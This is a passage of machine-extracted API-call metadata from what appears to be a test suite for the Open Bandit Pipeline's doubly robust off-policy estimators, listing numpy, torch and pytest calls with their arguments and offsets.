size=5)\n', (2834, 2845), True, 'import numpy as np\n'), ((2855, 2874), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (2863, 2874), True, 'import numpy as np\n'), ((2981, 3010), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (3001, 3010), False, 'from conftest import generate_action_dist\n'), ((3020, 3042), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (3028, 3042), True, 'import numpy as np\n'), ((3065, 3075), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (3072, 3075), True, 'import numpy as np\n'), ((3085, 3112), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (3101, 3112), True, 'import numpy as np\n'), ((3122, 3141), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (3130, 3141), True, 'import numpy as np\n'), ((3198, 3227), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (3218, 3227), False, 'from conftest import generate_action_dist\n'), ((3237, 3259), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', 
(3245, 3259), True, 'import numpy as np\n'), ((3269, 3296), 'numpy.zeros', 'np.zeros', (['(3, 2)'], {'dtype': 'int'}), '((3, 2), dtype=int)\n', (3277, 3296), True, 'import numpy as np\n'), ((3306, 3316), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (3313, 3316), True, 'import numpy as np\n'), ((3326, 3353), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (3342, 3353), True, 'import numpy as np\n'), ((3363, 3382), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (3371, 3382), True, 'import numpy as np\n'), ((3445, 3474), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (3465, 3474), False, 'from conftest import generate_action_dist\n'), ((3484, 3506), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (3492, 3506), True, 'import numpy as np\n'), ((3516, 3538), 'numpy.zeros', 'np.zeros', (['(4)'], {'dtype': 'int'}), '(4, dtype=int)\n', (3524, 3538), True, 'import numpy as np\n'), ((3548, 3558), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (3555, 3558), True, 'import numpy as np\n'), ((3568, 3595), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (3584, 3595), True, 'import numpy as np\n'), ((3605, 3624), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (3613, 3624), True, 'import numpy as np\n'), ((3699, 3728), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (3719, 3728), False, 'from conftest import generate_action_dist\n'), ((3738, 3760), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (3746, 3760), True, 'import numpy as np\n'), ((3770, 3792), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (3778, 3792), True, 'import numpy as np\n'), ((3815, 3842), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (3831, 3842), True, 'import numpy as np\n'), ((3852, 3871), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (3860, 3871), True, 'import numpy as np\n'), ((3928, 3957), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (3948, 3957), False, 'from conftest import generate_action_dist\n'), ((3967, 3989), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (3975, 3989), True, 'import numpy as np\n'), ((3999, 4021), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4007, 4021), True, 'import numpy as np\n'), ((4031, 4046), 'numpy.ones', 'np.ones', (['(5, 3)'], {}), '((5, 3))\n', (4038, 4046), True, 'import numpy as np\n'), ((4056, 4083), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (4072, 4083), True, 'import numpy as np\n'), ((4093, 4112), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (4101, 4112), True, 'import numpy as np\n'), ((4175, 4204), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (4195, 4204), False, 'from conftest import generate_action_dist\n'), ((4214, 4236), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4222, 4236), True, 'import numpy as np\n'), ((4246, 4268), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4254, 4268), True, 'import numpy as np\n'), ((4278, 4288), 'numpy.ones', 'np.ones', (['(4)'], {}), '(4)\n', (4285, 4288), True, 'import numpy as np\n'), 
((4298, 4325), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (4314, 4325), True, 'import numpy as np\n'), ((4335, 4354), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (4343, 4354), True, 'import numpy as np\n'), ((4438, 4467), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (4458, 4467), False, 'from conftest import generate_action_dist\n'), ((4477, 4499), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4485, 4499), True, 'import numpy as np\n'), ((4509, 4531), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4517, 4531), True, 'import numpy as np\n'), ((4541, 4553), 'numpy.arange', 'np.arange', (['(5)'], {}), '(5)\n', (4550, 4553), True, 'import numpy as np\n'), ((4563, 4590), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (4579, 4590), True, 'import numpy as np\n'), ((4600, 4619), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (4608, 4619), True, 'import numpy as np\n'), ((4677, 4706), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (4697, 4706), False, 'from conftest import generate_action_dist\n'), ((4716, 4738), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4724, 4738), True, 'import numpy as np\n'), ((4748, 4770), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4756, 4770), True, 'import numpy as np\n'), ((4780, 4790), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (4787, 4790), True, 'import numpy as np\n'), ((4800, 4827), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (4816, 4827), True, 'import numpy as np\n'), ((4837, 4856), 'numpy.zeros', 'np.zeros', (['(5, 4, 2)'], {}), '((5, 4, 2))\n', (4845, 4856), True, 'import numpy as np\n'), ((4965, 4994), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (4985, 4994), False, 'from conftest import generate_action_dist\n'), ((5004, 5026), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (5012, 5026), True, 'import numpy as np\n'), ((5036, 5058), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (5044, 5058), True, 'import numpy as np\n'), ((5068, 5078), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (5075, 5078), True, 'import numpy as np\n'), ((5088, 5115), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (5104, 5115), True, 'import numpy as np\n'), ((6686, 6719), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (6697, 6719), False, 'import torch\n'), ((6729, 6742), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (6739, 6742), False, 'import torch\n'), ((6807, 6829), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (6818, 6829), False, 'import torch\n'), ((6942, 6975), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (6953, 6975), False, 'import torch\n'), ((6999, 7012), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (7009, 7012), False, 'import torch\n'), ((7077, 7099), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (7088, 7099), False, 'import torch\n'), ((7212, 7245), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (7223, 7245), 
False, 'import torch\n'), ((7255, 7288), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (7266, 7288), False, 'import torch\n'), ((7367, 7389), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (7378, 7389), False, 'import torch\n'), ((7502, 7535), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (7513, 7535), False, 'import torch\n'), ((7545, 7578), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (7556, 7578), False, 'import torch\n'), ((7588, 7601), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (7598, 7601), False, 'import torch\n'), ((7807, 7842), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.float32'}), '(5, dtype=torch.float32)\n', (7818, 7842), False, 'import torch\n'), ((7852, 7885), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (7863, 7885), False, 'import torch\n'), ((7895, 7908), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (7905, 7908), False, 'import torch\n'), ((7973, 7995), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (7984, 7995), False, 'import torch\n'), ((8179, 8212), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (8190, 8212), False, 'import torch\n'), ((8222, 8235), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (8232, 8235), False, 'import torch\n'), ((8300, 8322), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (8311, 8322), False, 'import torch\n'), ((8472, 8505), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (8483, 8505), False, 'import torch\n'), ((8515, 8528), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (8525, 8528), False, 'import torch\n'), ((8593, 8615), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (8604, 8615), False, 'import torch\n'), ((8728, 8766), 'torch.zeros', 'torch.zeros', (['(3, 2)'], {'dtype': 'torch.int64'}), '((3, 2), dtype=torch.int64)\n', (8739, 8766), False, 'import torch\n'), ((8776, 8809), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (8787, 8809), False, 'import torch\n'), ((8819, 8832), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (8829, 8832), False, 'import torch\n'), ((8897, 8919), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (8908, 8919), False, 'import torch\n'), ((9086, 9119), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (9097, 9119), False, 'import torch\n'), ((9129, 9142), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (9139, 9142), False, 'import torch\n'), ((9207, 9229), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (9218, 9229), False, 'import torch\n'), ((9393, 9426), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (9404, 9426), False, 'import torch\n'), ((9449, 9462), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (9459, 9462), False, 'import torch\n'), ((9527, 9549), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (9538, 9549), False, 'import torch\n'), ((9662, 9695), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (9673, 9695), False, 'import torch\n'), ((9705, 9743), 'torch.zeros', 'torch.zeros', (['(3, 2)'], {'dtype': 'torch.int64'}), '((3, 2), 
dtype=torch.int64)\n', (9716, 9743), False, 'import torch\n'), ((9753, 9766), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (9763, 9766), False, 'import torch\n'), ((9831, 9853), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (9842, 9853), False, 'import torch\n'), ((9973, 10006), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (9984, 10006), False, 'import torch\n'), ((10016, 10049), 'torch.zeros', 'torch.zeros', (['(4)'], {'dtype': 'torch.int64'}), '(4, dtype=torch.int64)\n', (10027, 10049), False, 'import torch\n'), ((10059, 10072), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (10069, 10072), False, 'import torch\n'), ((10137, 10159), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (10148, 10159), False, 'import torch\n'), ((10291, 10324), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (10302, 10324), False, 'import torch\n'), ((10334, 10367), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (10345, 10367), False, 'import torch\n'), ((10445, 10467), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (10456, 10467), False, 'import torch\n'), ((10580, 10613), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (10591, 10613), False, 'import torch\n'), ((10623, 10656), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (10634, 10656), False, 'import torch\n'), ((10666, 10684), 'torch.ones', 'torch.ones', (['(5, 3)'], {}), '((5, 3))\n', (10676, 10684), False, 'import torch\n'), ((10749, 10771), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (10760, 10771), False, 'import torch\n'), ((10891, 10924), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (10902, 10924), False, 'import torch\n'), ((10934, 10967), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (10945, 10967), False, 'import torch\n'), ((10977, 10990), 'torch.ones', 'torch.ones', (['(4)'], {}), '(4)\n', (10987, 10990), False, 'import torch\n'), ((11055, 11077), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (11066, 11077), False, 'import torch\n'), ((11218, 11251), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (11229, 11251), False, 'import torch\n'), ((11261, 11294), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (11272, 11294), False, 'import torch\n'), ((11399, 11421), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (11410, 11421), False, 'import torch\n'), ((11536, 11569), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (11547, 11569), False, 'import torch\n'), ((11579, 11612), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (11590, 11612), False, 'import torch\n'), ((11622, 11635), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (11632, 11635), False, 'import torch\n'), ((11700, 11722), 'torch.zeros', 'torch.zeros', (['(5, 4, 2)'], {}), '((5, 4, 2))\n', (11711, 11722), False, 'import torch\n'), ((11888, 11921), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (11899, 11921), False, 'import torch\n'), ((11931, 11964), 'torch.zeros', 'torch.zeros', 
(['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (11942, 11964), False, 'import torch\n'), ((11974, 11987), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (11984, 11987), False, 'import torch\n'), ((13450, 13500), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'f"""{description}*"""'}), "(ValueError, match=f'{description}*')\n", (13463, 13500), False, 'import pytest\n'), ((13514, 13541), 'obp.ope.SwitchDoublyRobust', 'SwitchDoublyRobust', ([], {'tau': 'tau'}), '(tau=tau)\n', (13532, 13541), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((14243, 14293), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'f"""{description}*"""'}), "(ValueError, match=f'{description}*')\n", (14256, 14293), False, 'import pytest\n'), ((14307, 14349), 'obp.ope.DoublyRobustWithShrinkage', 'DoublyRobustWithShrinkage', ([], {'lambda_': 'lambda_'}), '(lambda_=lambda_)\n', (14332, 14349), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((14724, 14753), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (14744, 14753), False, 'from conftest import generate_action_dist\n'), ((14763, 14790), 'numpy.random.choice', 'np.random.choice', (['(4)'], {'size': '(5)'}), '(4, size=5)\n', (14779, 14790), True, 'import numpy as np\n'), ((14800, 14822), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (14808, 14822), True, 'import numpy as np\n'), ((14832, 14876), 'numpy.random.uniform', 'np.random.uniform', ([], {'low': '(0.5)', 'high': '(1.0)', 'size': '(5)'}), '(low=0.5, high=1.0, size=5)\n', (14849, 14876), True, 'import numpy as np\n'), ((14886, 14913), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (14902, 14913), True, 'import numpy as np\n'), ((14923, 14942), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (14931, 14942), True, 'import numpy as np\n'), ((16181, 16214), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (16192, 16214), False, 'import torch\n'), ((16351, 16373), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (16362, 16373), False, 'import torch\n'), ((23912, 23950), 'numpy.abs', 'np.abs', (['(dr_value - dr_shrink_max_value)'], {}), '(dr_value - dr_shrink_max_value)\n', (23918, 23950), True, 'import numpy as np\n'), ((2003, 2025), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (2011, 2025), True, 'import numpy as np\n'), ((2730, 2752), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (2738, 2752), True, 'import numpy as np\n'), ((5712, 5762), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'f"""{description}*"""'}), "(ValueError, match=f'{description}*')\n", (5725, 5762), False, 'import pytest\n'), ((6088, 6138), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'f"""{description}*"""'}), "(ValueError, match=f'{description}*')\n", (6101, 6138), False, 'import pytest\n'), ((6632, 6661), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (6652, 6661), False, 'from conftest import generate_action_dist\n'), ((6769, 6796), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (6785, 6796), True, 'import numpy as np\n'), ((6902, 6931), 
'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (6922, 6931), False, 'from conftest import generate_action_dist\n'), ((7039, 7066), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (7055, 7066), True, 'import numpy as np\n'), ((7172, 7201), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (7192, 7201), False, 'from conftest import generate_action_dist\n'), ((7329, 7356), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (7345, 7356), True, 'import numpy as np\n'), ((7462, 7491), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (7482, 7491), False, 'from conftest import generate_action_dist\n'), ((7628, 7655), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (7644, 7655), True, 'import numpy as np\n'), ((7767, 7796), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (7787, 7796), False, 'from conftest import generate_action_dist\n'), ((7935, 7962), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (7951, 7962), True, 'import numpy as np\n'), ((8092, 8121), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (8112, 8121), False, 'from conftest import generate_action_dist\n'), ((8132, 8165), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (8143, 8165), False, 'import torch\n'), ((8262, 8289), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (8278, 8289), True, 'import numpy as np\n'), ((8419, 8448), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (8439, 8448), False, 'from conftest import generate_action_dist\n'), ((8555, 8582), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (8571, 8582), True, 'import numpy as np\n'), ((8688, 8717), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (8708, 8717), False, 'from conftest import generate_action_dist\n'), ((8859, 8886), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (8875, 8886), True, 'import numpy as np\n'), ((8999, 9028), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (9019, 9028), False, 'from conftest import generate_action_dist\n'), ((9039, 9072), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (9050, 9072), False, 'import torch\n'), ((9169, 9196), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (9185, 9196), True, 'import numpy as np\n'), ((9353, 9382), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (9373, 9382), False, 'from conftest import generate_action_dist\n'), ((9489, 9516), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (9505, 9516), True, 'import numpy as np\n'), ((9622, 9651), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (9642, 9651), False, 'from conftest import generate_action_dist\n'), ((9793, 9820), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), 
'(3, size=5)\n', (9809, 9820), True, 'import numpy as np\n'), ((9933, 9962), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (9953, 9962), False, 'from conftest import generate_action_dist\n'), ((10099, 10126), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (10115, 10126), True, 'import numpy as np\n'), ((10251, 10280), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (10271, 10280), False, 'from conftest import generate_action_dist\n'), ((10407, 10434), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (10423, 10434), True, 'import numpy as np\n'), ((10540, 10569), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (10560, 10569), False, 'from conftest import generate_action_dist\n'), ((10711, 10738), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (10727, 10738), True, 'import numpy as np\n'), ((10851, 10880), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (10871, 10880), False, 'from conftest import generate_action_dist\n'), ((11017, 11044), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (11033, 11044), True, 'import numpy as np\n'), ((11178, 11207), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (11198, 11207), False, 'from conftest import generate_action_dist\n'), ((11321, 11333), 'numpy.arange', 'np.arange', (['(5)'], {}), '(5)\n', (11330, 11333), True, 'import numpy as np\n'), ((11361, 11388), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (11377, 11388), True, 'import numpy as np\n'), ((11496, 11525), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (11516, 11525), False, 'from conftest import generate_action_dist\n'), ((11662, 11689), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (11678, 11689), True, 'import numpy as np\n'), ((11848, 11877), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (11868, 11877), False, 'from conftest import generate_action_dist\n'), ((12014, 12041), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (12030, 12041), True, 'import numpy as np\n'), ((12664, 12714), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'f"""{description}*"""'}), "(ValueError, match=f'{description}*')\n", (12677, 12714), False, 'import pytest\n'), ((16086, 16115), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (16106, 16115), False, 'from conftest import generate_action_dist\n'), ((16143, 16170), 'numpy.random.choice', 'np.random.choice', (['(4)'], {'size': '(5)'}), '(4, size=5)\n', (16159, 16170), True, 'import numpy as np\n'), ((16241, 16285), 'numpy.random.uniform', 'np.random.uniform', ([], {'low': '(0.5)', 'high': '(1.0)', 'size': '(5)'}), '(low=0.5, high=1.0, size=5)\n', (16258, 16285), True, 'import numpy as np\n'), ((16313, 16340), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (16329, 16340), True, 'import numpy as np\n'), ((18944, 18963), 'torch.from_numpy', 'torch.from_numpy', (['v'], {}), '(v)\n', (18960, 18963), False, 'import 
torch\n'), ((22095, 22114), 'torch.from_numpy', 'torch.from_numpy', (['v'], {}), '(v)\n', (22111, 22114), False, 'import torch\n'), ((24131, 24150), 'torch.from_numpy', 'torch.from_numpy', (['v'], {}), '(v)\n', (24147, 24150), False, 'import torch\n'), ((18612, 18766), 're.escape', 're.escape', (['"""estimate_policy_value() missing 4 required positional arguments: \'reward\', \'action\', \'pscore\', and \'estimated_rewards_by_reg_model\'"""'], {}), '(\n "estimate_policy_value() missing 4 required positional arguments: \'reward\', \'action\', \'pscore\', and \'estimated_rewards_by_reg_model\'"\n )\n', (18621, 18766), False, 'import re\n'), ((19478, 19565), 're.escape', 're.escape', (['"""This is not implemented for Swtich-DR because it is indifferentiable."""'], {}), "(\n 'This is not implemented for Swtich-DR because it is indifferentiable.')\n", (19487, 19565), False, 'import re\n'), ((20348, 20435), 're.escape', 're.escape', (['"""This is not implemented for Swtich-DR because it is indifferentiable."""'], {}), "(\n 'This is not implemented for Swtich-DR because it is indifferentiable.')\n", (20357, 20435), False, 'import re\n'), ((20660, 20821), 're.escape', 're.escape', (['"""estimate_policy_value_tensor() missing 4 required 